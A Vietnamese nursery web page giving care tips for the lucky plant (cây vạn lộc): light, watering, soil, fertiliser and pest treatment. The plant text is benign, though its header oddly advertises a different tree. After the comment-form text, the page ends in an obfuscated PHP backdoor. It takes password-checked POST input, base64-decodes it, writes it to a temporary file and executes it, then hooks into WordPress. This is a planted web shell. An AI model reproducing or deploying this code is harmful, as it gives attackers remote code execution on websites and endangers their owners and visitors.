Cây Vạn Lộc

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Với những người chơi cây cảnh, chắc hẳn ai cũng có cho mình chậu cây vạn lộc trong nhà hay văn phòng làm việc. Bởi đây là loại cây được biết đến với ý nghĩa đem lại tương lai may mắn tài lộc cho mọi người.

 

Và trong bài viết dưới đây, chúng tôi https://vuoncayhoabinh.com  sẽ giới thiệu đến bạn chi tiết cách chăm sóc cây vạn lộc sao cho cây sinh trưởng và phát triển tốt nhất.

 

Cách Chăm Sóc Cây Vạn Lộc Cực Đơn Giản Cho Bạn
Cách Chăm Sóc Cây Vạn Lộc Cực Đơn Giản Cho Bạn

 

 

Đôi nét về cây vạn lộc

 

Cây vạn lộc hay còn có tên gọi khác là cây Thiên Phú. Cây có xuất xứ từ Thái Lan, Indonesia và phù hợp với khí hậu cũng như xuất hiện nhiều ở khu vực Đông Nam Á, Nam Trung Quốc và Bắc Ấn Độ.

 

Cây có tác dụng thanh lọc không khí, hấp thụ các độc tố, chất hữu cơ gây bệnh cho con người, tạo ra khoảng xanh, trong lành. Không chỉ vậy, nó còn mang ý nghĩa phong thủy đem đến tài lộc và may mắn.

 

Với kích thước nhỏ gọn, xinh xắn, cây tài lộc phù hợp với mọi không gian. Bạn có thể đặt nó trong phòng khách của căn nhà hay bàn làm việc trong công ty và trang trí cho các quán cà phê… Việc đặt cây vạn lộc trang trí còn tạo nên không gian xanh, trong lành và tốt cho sức khỏe con người.

 

Chính vì vậy, cây vạn lộc cũng chính là món quà mà nhiều người lựa chọn để tặng cho người thân, bạn bè như thể hiện lời cầu chúc may mắn và tài lộc.

 

Cách Chăm Sóc Cây Vạn Lộc Cực Đơn Giản Cho Bạn
Cách Chăm Sóc Cây Vạn Lộc Cực Đơn Giản Cho Bạn

 Cách chăm sóc cây vạn lộc

 

Để cho cây vạn lộc được sống khỏe mạnh, tươi tốt và phát triển thì bạn nên chú ý những điều kiện sinh trưởng đặc thù của nó như sau:

 

Ánh sáng:

Nên đặt cây ở trong môi trường có điều kiện ánh sáng không quá chói gắt. Nếu ánh sáng có cường độ mạnh rọi trực tiếp vào cây trong thời gian dài có thể làm cho cây bị héo rũ, thậm chí là bị cháy lá. Tình trạng đó nếu kéo dài sẽ làm cho cây bị chết.

 

Do đó, mỗi ngày chỉ cần đặt cây cạnh cửa sổ có ánh nắng chiếu vào tầm 2,3 tiếng dưới ánh năng để sắc lá được tươi tốt.

 

Nhiệt độ:

 

Cần chú ý đặt cây sống trong điều kiện nhiệt độ không quá cao, đặt trong phòng sẽ không có sự lưu thông không khí, cây bị thiếu ánh sáng và quá nóng bức thì sẽ không thể phát triển tốt được.

 

Tuy nhiên nếu để trong phòng máy lạnh thường xuyên thì nên định kỳ mang ra ngoài cho cây sưởi ấm, làm hồng sắc lá mỗi tuần.

 

Nước:

 

Cây vạn lộc có tính háo nước, vì vậy, bạn cần nhớ tưới nước đều mỗi ngày để đảm bảo cung cấp đủ nước cho cây. Nhưng lưu không nên tưới quá nhiều, đảm bảo đất nhanh ráo và thoát nước tốt. nếu trong trường hợp nước không thể thoát và tưới liên tục sẽ làm cho rễ cây bị úng thối. Khi đó, phải nhanh chóng thay đất mới cho cây.

 

Cách Chăm Sóc Cây Vạn Lộc Cực Đơn Giản Cho Bạn
Cách Chăm Sóc Cây Vạn Lộc Cực Đơn Giản Cho Bạn

 

Trong trường hợp bạn trồng thủy sinh thì định kỳ mỗi tuần nên thay nước ít nhất 1 lần, bỏ bớt rễ úng thối, làm sạch cây, lá trước khi cho lại vào chậu. Nếu dùng nước máy thì đem phơi nắng trước khi đổ vào chậu.

 

Đất:

 

Đây chính là nguồn dưỡng chất giúp cung cấp các chất dinh dưỡng cần thiết cho cây hấp thụ. Nếu thấy cây phát triển không tốt trong khi các điều kiện như: nước, ánh sáng, nhiệt độ đều đảm bảo thì cần phải xem lại đất. Bạn cũng có thể bón thêm phân vào hoặc thay đất mới đủ dinh dưỡng hơn.

Phân bón:

 

Nên lựa chọn sử dụng phân bón hoặc những dung dịch thủy sinh được bán theo cây. Với phân bón thì bón định kỳ 4 – 6 tháng/ lần, còn dung dịch thủy sinh thì có thể dùng mỗi khi thay nước. Tuy nhiên, lưu ý không nên dùng quá nhiều tránh làm úng và hư lá cây.

 

Sâu bệnh của cây:

 

Với cây vạn lộc thường có những vi khuẩn hoặc nấm gây hại tấn công làm cho thân cây dần chuyển sang màu đen và bị thối rữa. Chính vì thế, cần phải chủ động theo dõi để phát hiện bệnh kịp thời và có cách xử lý.

 

Cách Chăm Sóc Cây Vạn Lộc Cực Đơn Giản Cho Bạn
Cách Chăm Sóc Cây Vạn Lộc Cực Đơn Giản Cho Bạn

 

Một số bệnh mà cây có thể bị mắc phải như: Thối lá, sâu ăn lá, phấn trắng… Với những bệnh này, đầu tiên nên dùng kéo cắt sạch vùng lá bị thối hoặc cắt tới sát phần cuống lá. Dùng nước rửa sạch cho cây đặc biệt là chỗ bị thối (đối với cây trồng trong đất) hoặc súc rửa nước trong chậu, bình (đối với cây vạn lộc trong nước).

 

Cuối cùng, đem cây ra nắng và tiêu diệt các vi khuẩn. Nên đem ra phơi khoảng 7 – 9h sáng.

 

Có thể thấy, với một loại cây mang theo nhiều ý nghĩa và tác dụng với con người như vậy thì đây là một loài cây không khó chăm sóc. Bạn chỉ cần lưu ý một vài đặc điểm sinh trưởng là có thể dễ dàng trồng cây phát triển và tươi tốt mỗi ngày.

 

Hy vọng với những gợi ý về cách chăm sóc cây vạn lộc của chúng tôi https://vuoncayhoabinh.com sẽ giúp cho bạn có thể chăm cây tươi tốt và phát triển nhanh chóng, giúp đem lại may mắn, sức khỏe và tài lộc cho chính mình. Với nhiều năm kinh nghiệm trong kinh doanh các dòng cây hàng đầu trong: cây công trình, cây xanh đô thị, cây xanh nội thất, cây phong thủy,…chúng tôi tin có thể mang đến cho bạn những dòng cây tốt nhất.

 

 

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}